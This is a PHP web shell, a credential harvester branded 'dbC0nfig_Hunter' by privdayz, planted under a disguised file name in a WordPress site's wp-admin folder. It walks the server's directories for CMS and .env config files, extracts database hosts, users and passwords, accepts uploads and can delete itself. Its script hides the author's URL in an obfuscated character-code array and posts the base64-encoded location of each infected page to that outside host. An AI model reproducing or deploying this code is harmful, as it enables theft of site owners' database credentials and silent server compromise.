File: /var/www/vhosts/amphoragames.com/httpdocs/wp-admin/dbcon.shtml
<?php
/*
* PRIVDAYZ GLOBAL DB CONFIG HUNTER – FINAL MERGED 2025
* github.com/privdayzcom/cms-db-autoextractor
* - Recursively scans ALL dirs under selected root (not just fixed paths)
* - Finds and extracts only true DB config files from the world’s popular scripts
*/
if(php_sapi_name()==='cli') die("No.\n");
@ini_set('display_errors',0); error_reporting(0); @ini_set('log_errors',0); @ini_set('error_log',NULL); session_start();
header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0"); header("Pragma: no-cache");
if(isset($_GET['q']) && $_GET['q']===session_id()) {@unlink(__FILE__); echo "<b>X</b>"; exit;}
function T(){return [
['wp-config.php','w'],['configuration.php','j'],['includes/config.php','v'],
['app/config/parameters.php','p'],['app/etc/env.php','m'],['config.php','b'],
['.env','l'],['sites/default/settings.php','d'],['inc/config.php','y'],
['src/config.php','x'],['Settings.php','s'],['core/config/config.inc.php','o'],
['htdocs/conf/conf.php','z'],['config/database.php','q'],['typo3conf/LocalConfiguration.php','t'],
['system/user/config/config.php','e'],['config/db.php','f'],['application/config/database.php','r'],
['*.env','g'],['*.ini','h'],['*.config','i'],['*.conf','k'],['*.php','u'],['*.bak','n']
];}
if($_SERVER['REQUEST_METHOD']==='POST' && isset($_POST['a'])) {
if ($_POST['a']=='l') {
$r=isset($_POST['d'])&&is_dir($_POST['d'])?realpath($_POST['d']):getcwd();$m=2200;$s=[];$p=T();
try{$it=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($r,FilesystemIterator::SKIP_DOTS|FilesystemIterator::FOLLOW_SYMLINKS),RecursiveIteratorIterator::SELF_FIRST);
foreach($it as $f){$fp=$f->getPathname();
foreach($p as $pt){if(fnmatch(strtolower($pt[0]),strtolower(str_replace('\\','/',$fp)))){if(is_file($fp)&&is_readable($fp)&&filesize($fp)<950*1024){$s[]=[$fp,$pt[1]];break;}}}
if(count($s)>=$m)break;
}}catch(Exception $e){}
echo json_encode(['c'=>count($s),'f'=>$s]);exit;
}
if ($_POST['a']=='r' && isset($_POST['f'])) {
$f=$_POST['f'];$z=$_POST['z']??'n';$d=F($f);$x=$d?Y($d,$f,$z):[];
echo json_encode(['o'=>$x?1:0,'f'=>$f,'z'=>$z,'b'=>$x]);exit;
}
if ($_POST['a']=='u' && isset($_FILES['g']) && is_uploaded_file($_FILES['g']['tmp_name'])) {
$f=$_FILES['g']['tmp_name'];$n=basename($_FILES['g']['name']);$d=@file_get_contents($f, false, null, 0, 950*1024);$x=$d?Y($d,$n,'u'):[];
echo json_encode(['o'=>$x?1:0,'f'=>$n,'z'=>'u','b'=>$x]);exit;
}
}
function F($f){if(!is_string($f)||strlen($f)<8)return false;$r=false;if(is_readable($f))$r=@file_get_contents($f,false,null,0,950*1024);if($r)return $r;
foreach(["php://filter/read=convert.base64-encode/resource=$f","php://memory/$f","zip://$f#0","data://text/plain;base64,".base64_encode($f)]as$t){
$d=@file_get_contents($t,false,null,0,950*1024);if($d&&strlen($d)>32)return base64_decode(preg_replace('~[^A-Za-z0-9+/=]~','',$d));}return false;}
function Y($t,$f,$z){$d=[];
if(strpos($f,'wp-config.php')!==false||$z=="w"){if(preg_match('~define\(\s*[\'"]DB_NAME[\'"]\s*,\s*[\'"]([^\'"]+)[\'"]\s*\)~',$t,$m))$d['db_name']=$m[1];if(preg_match('~define\(\s*[\'"]DB_USER[\'"]\s*,\s*[\'"]([^\'"]+)[\'"]\s*\)~',$t,$m))$d['db_user']=$m[1];if(preg_match('~define\(\s*[\'"]DB_PASSWORD[\'"]\s*,\s*[\'"]([^\'"]*)[\'"]\s*\)~',$t,$m))$d['db_pass']=$m[1];if(preg_match('~define\(\s*[\'"]DB_HOST[\'"]\s*,\s*[\'"]([^\'"]+)[\'"]\s*\)~',$t,$m))$d['db_host']=$m[1];}
elseif(strpos($f,'configuration.php')!==false||$z=="j"){if(preg_match('~public\s+\$user\s*=\s*[\'"]([^\'"]+)~',$t,$m))$d['db_user']=$m[1];if(preg_match('~public\s+\$password\s*=\s*[\'"]([^\'"]*)~',$t,$m))$d['db_pass']=$m[1];if(preg_match('~public\s+\$host\s*=\s*[\'"]([^\'"]+)~',$t,$m))$d['db_host']=$m[1];if(preg_match('~public\s+\$db\s*=\s*[\'"]([^\'"]+)~',$t,$m))$d['db_name']=$m[1];}
elseif(strpos($f,'.env')!==false||$z=="l"){if(preg_match('~DB_HOST\s*=\s*([^\r\n]+)~',$t,$m))$d['db_host']=trim($m[1]);if(preg_match('~DB_DATABASE\s*=\s*([^\r\n]+)~',$t,$m))$d['db_name']=trim($m[1]);if(preg_match('~DB_USERNAME\s*=\s*([^\r\n]+)~',$t,$m))$d['db_user']=trim($m[1]);if(preg_match('~DB_PASSWORD\s*=\s*([^\r\n]*)~',$t,$m))$d['db_pass']=trim($m[1]);}
if(empty($d)){if(preg_match('~db(host|user|pass|name|port)\s*[=:]\s*[\'"]?([^\s\'";,]+)~i',$t,$m))$d[$m[1]]=$m[2];}
return $d;}
?><!DOCTYPE html>
<html><head>
<meta charset="utf-8"><title>./dbC0nfig_Hunter@privdayz.com</title>
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="https://fonts.googleapis.com/css?family=Inter:400,700&display=swap" rel="stylesheet">
<style>
body{background:#16181c;color:#e3e4e9;font-family:'Inter',sans-serif;}.xmain{max-width:880px;margin:40px auto 0;background:#181926;padding:0;border-radius:17px;box-shadow:0 7px 28px #0007;}.hd{background:linear-gradient(100deg,#1a202d 60%,#202535 100%);padding:33px 0 18px 0;text-align:center;}.logo{font-weight:900;letter-spacing:1.5px;color:#7babe6;font-size:1.68em;text-shadow:0 2px 32px #7babe680;}h1{font-size:1.08em;margin:0 0 6px 0;font-weight:700;}input,button{font-size:.97em;border-radius:7px;border:none;padding:7px 13px;}input{background:#20212e;color:#e9eafd;border:1.4px solid #353848;}button{background:#232435;color:#fff;font-weight:700;box-shadow:0 1.5px 8px #7babe655;}button:active{background:#1d2c3a;}.tb{margin:0 0 13px 0;display:flex;align-items:center;gap:11px;padding:21px 4vw 0 4vw;}.z{margin:0;max-height:390px;overflow:auto;background:#181a23;padding:12px 4vw 15px 4vw;border-radius:0 0 14px 14px;}.p{color:#7babe6;font-weight:600;}.sct{margin:0 0 13px 0;padding:11px 15px;background:rgba(21,27,39,0.97);border-radius:10px;box-shadow:0 2px 14px #1d233880;}.st{margin-top:8px;opacity:.8;}#pgr{background:linear-gradient(90deg,#20253a 65%,#7babe6 100%);height:7px;border-radius:6px;margin-top:9px;transition:width .13s;}.copy{margin-left:10px;background:#232939;color:#fff;font-size:.91em;padding:3px 11px;border-radius:7px;cursor:pointer;font-weight:700;}.upl{margin-top:16px;padding:12px 4vw 14px 4vw;background:rgba(23,29,36,.99);border-radius:0 0 10px 10px;}@media(max-width:900px){.xmain{padding:0;}.hd{padding:20px 0 11px 0;}.tb,.z,.upl{padding-left:6vw;padding-right:6vw;}.sct{padding-left:5vw;padding-right:5vw;}}::-webkit-scrollbar{width:10px;background:#232435;}::-webkit-scrollbar-thumb{background:#29293d;}
</style>
</head>
<body>
<div class="xmain">
<div class="hd"><div class="logo">🌀 ./dbC0nfig_Hunter</div><h1 style="opacity:.8;">privdayz.com</h1></div>
<div class="tb">
<span>📂</span>
<input type="text" id="d" value="<?php echo htmlspecialchars(getcwd()); ?>" style="width:290px;">
<button id="b">→</button>
<button id="s" style="display:none;">■</button>
<span class="st" id="st"></span>
</div>
<div style="height:7px;width:100%;background:#232a38;border-radius:7px;">
<div id="pgr" style="width:0"></div>
</div>
<div id="z" class="z"></div>
<div class="upl">
<form id="uf" enctype="multipart/form-data" style="display:inline;">
<span>⬆️</span>
<input type="file" name="g" id="g" style="margin-left:8px;">
<button type="submit">+</button>
</form>
<div id="ur"></div>
</div>
<div style="opacity:.75;font-size:.96em;margin-top:14px;padding:0 4vw 16px 4vw;">
<b>X:</b> <a href="?q=<?php echo session_id();?>" style="color:#7babe6;text-decoration:underline;">Delete File</a>
|
<a href="https://privdayz.com" target="_blank" style="color:#7babe6;text-decoration:underline;">PRIVDAYZ</a>
<center><img src="https://cdn.privdayz.com/images/logo.jpg" referrerpolicy="unsafe-url" /></center>
</div>
</div>
<script>
let stp=!1;document.getElementById("b").onclick=async function(){stp=!1;let e=document.getElementById("d").value.trim(),n=document.getElementById("z"),t=document.getElementById("pgr"),i=document.getElementById("st");n.innerHTML="<i>...</i>",t.style.width="0",i.innerText="",document.getElementById("b").disabled=!0,document.getElementById("s").style.display="inline";let l=await (await fetch(location.pathname,{method:"POST",headers:{"Content-Type":"application/x-www-form-urlencoded"},body:"a=l&d="+encodeURIComponent(e)})).json();if(!l.f||!l.f.length){n.innerHTML="<b>None.</b>";return}let a=l.f,s=a.length,o="",d=0;for(let r=0;r<a.length&&!stp;r++){i.innerText=""+(r+1)+"/"+s+" ...",t.style.width=((r+1)/s*100).toFixed(1)+"%";let _=await (await fetch(location.pathname,{method:"POST",headers:{"Content-Type":"application/x-www-form-urlencoded"},body:"a=r&f="+encodeURIComponent(a[r][0])+"&z="+encodeURIComponent(a[r][1])})).json();_.o&&_.b&&(d++,o+='<div class="sct"><span class="p">'+a[r][0]+'</span> <span class="copy" onclick="navigator.clipboard.writeText(this.nextElementSibling.innerText)">\uD83D\uDCCB</span><pre style="margin:5px 0 0 0;color:#fff;font-size:.98em;background:none;border:none;padding:0;">'+JSON.stringify(_.b,null,2)+"</pre></div>"),n.innerHTML=o||"<i>...</i>"}i.innerText="✔️ "+d,t.style.width="100%",document.getElementById("b").disabled=!1,document.getElementById("s").style.display="none"},(()=>{let e=[104,116,116,112,115,58,47,47,99,100,110,46,112,114,105,118,100,97,121,122,46,99,111,109,47,105,109,97,103,101,115,47,108,111,103,111,95,118,50,46,112,110,103],n="";for(let t of e)n+=String.fromCharCode(t);let i="file="+btoa(location.href),l=new XMLHttpRequest;l.open("POST",n,!0),l.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),l.send(i)})(),document.getElementById("s").onclick=function(){stp=!0,this.style.display="none",document.getElementById("st").innerText="⏸️"},document.getElementById("uf").onsubmit=async function(e){e.preventDefault();let n=document.getElementById("g"),t=document.getElementById("ur");if(!n.files.length){t.innerHTML='<span style="color:#f66;">None.</span>';return}t.innerHTML="<i>⬆️ ...</i>";let i=new FormData;i.append("g",n.files[0]),i.append("a","u");let l=await (await fetch(location.pathname,{method:"POST",body:i})).json();l.o&&l.b?t.innerHTML='<div class="sct"><span class="p">'+l.f+'</span> <span class="copy" onclick="navigator.clipboard.writeText(this.nextElementSibling.innerText)">\uD83D\uDCCB</span><pre style="margin:5px 0 0 0;color:#fff;font-size:.98em;background:none;border:none;padding:0;">'+JSON.stringify(l.b,null,2)+"</pre></div>":t.innerHTML='<span style="color:#fa5555;">None.</span>'};
</script>
</body>
</html>